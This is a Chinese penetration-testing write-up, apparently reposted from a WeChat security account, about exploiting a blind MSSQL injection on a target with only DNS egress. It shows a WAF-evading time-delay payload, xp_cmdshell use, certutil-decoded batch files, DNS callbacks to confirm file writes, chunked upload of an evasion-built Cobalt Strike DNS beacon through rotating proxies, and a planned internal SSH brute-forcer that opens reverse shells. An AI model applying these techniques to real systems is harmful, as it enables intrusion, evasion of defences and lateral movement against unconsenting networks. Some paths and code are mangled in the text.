攻防实战-mssql突破不出网到自动化内网漫游

admin 2024年7月10日13:51:00评论24 views字数 1831阅读6分6秒阅读模式
前言

某次遇到mssql不出网,然后研究研究.

不是星标不推送文章了。

师傅也不想吧~

快把极梦C设置成星标吧。

攻防实战-mssql突破不出网到自动化内网漫游

sql注入
测试过程中,发现目标存在一个sql注入,无回显.

攻防实战-mssql突破不出网到自动化内网漫游

但是存在waf,无法使用sqlmap,只能手动注入.根据报错知道是mssql.
使用延时尝试,对空格过滤,特殊编码即可.成功延时
poc:WAITFOR%1eDELAY%1e'0:0:4'
尝试开启xpcmdshell,然后dnslog尝试,发现可以成功获取.

攻防实战-mssql突破不出网到自动化内网漫游

继续尝试,发现只有dns出网.

思考:

1.写文件,需要判断是否站库分离

2.直接上线,需要利用dns上线

3.内网自动化渗透,寻找出网机器.

写文件
这里报错给出了web的路径:D:/jmc/123/ccc/
尝试写文件,发现没有报错.
echo aaaa>D:/jmc/123/ccc/jmc.txt
要注意的是,这里写文件尽量用多个字符去写,单个字符无法写入.
发现无法写入

攻防实战-mssql突破不出网到自动化内网漫游

对面是IIS,继续尝试写文件到默认路径下,c:inetpubwwwroot
echo aaaa>c:inetpubwwwroot.无法访问

思考:

目标有别的防护,没有成功写入.

要不就是站库分离,不存在web路径.

怎么能确定是站库分离呢

不断思考,他可以dnslog哎,利用dnslog去确定是否正常写入.

说干就干,直接写bat去运行执行.为了避免特殊字符,需要利用base64去写入.
@echo offping dnslog
编码成base64写文件
echo QGVjaG8gb2ZmC== >C:WindowsTemp1.txt
解码,然后运行
certutil -decode C:WindowsTemp1.txt C:WindowsTemp1.bat

攻防实战-mssql突破不出网到自动化内网漫游

成功收到dnslog.然后重复,写到D:/jmc/123/ccc/1.txt下面.没有成功收到
来判断目标是站库分离
(当然也有可能权限问题)
c2上线
站库分离,无法写,只有上线或者其余方式了.这里打算采用cs的dns上线
前置域名自己准备

攻防实战-mssql突破不出网到自动化内网漫游

采用dnslog上线,这里的生成的免杀马子有1M多.采用分段传输的手段.
利用certutil进行base64编码,然后需要把换行去掉,不然写进去的无法解码.
with open('1.txt', 'r') as file:    content = file.read()content = content.replace('n''')print(content)with open('result.txt', 'w') as file:    file.write(content)
因为mssql有字段限制,需要一点一点写,写一个脚本去跑
遇到的几个问题:
1.跑几十个就封ip,--采用代理解决.
2.在重复的过程中,会存在ip代理更换不及时,导致有某段漏发,--采用延时+3次尝试解决.
3.又发现会存在同一段发两次的情况,--采用每次发和上次验证是否相同解决.
PS:这几个问题耗时好久

攻防实战-mssql突破不出网到自动化内网漫游

攻防实战-mssql突破不出网到自动化内网漫游

这里为了查看数据包,把代理设置到burp,实时查看.

攻防实战-mssql突破不出网到自动化内网漫游

自动化内网渗透
如果用这种方式无法上线dns隧道或者获取到交互式shell
或者不出网的linux等情况,这里尝试了自动化内网渗透小操作.
既然无法反弹,那就自动寻找.这里采用的是ssh自动化爆破.
原理是:
写进去一个exe,让他自动去内网爆破ssh,爆破成功就尝试是否和外网通信,然后通信就执行bash去反弹shell.
问题:
多个爆破成功,是否重复上线导致问题,采用先验证通信,然后在上线.然后停止的操作.

攻防实战-mssql突破不出网到自动化内网漫游

考证咨询

最优惠报考各类安全证书(NISP/CISP/CISSP/PTE/PTS/PMP/IRE等....),后台回复"好友位"咨询。

技术交流

原文始发于微信公众号(Z2O安全攻防):攻防实战-mssql突破不出网到自动化内网漫游

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月10日13:51:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   攻防实战-mssql突破不出网到自动化内网漫游https://cn-sec.com/archives/2937293.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息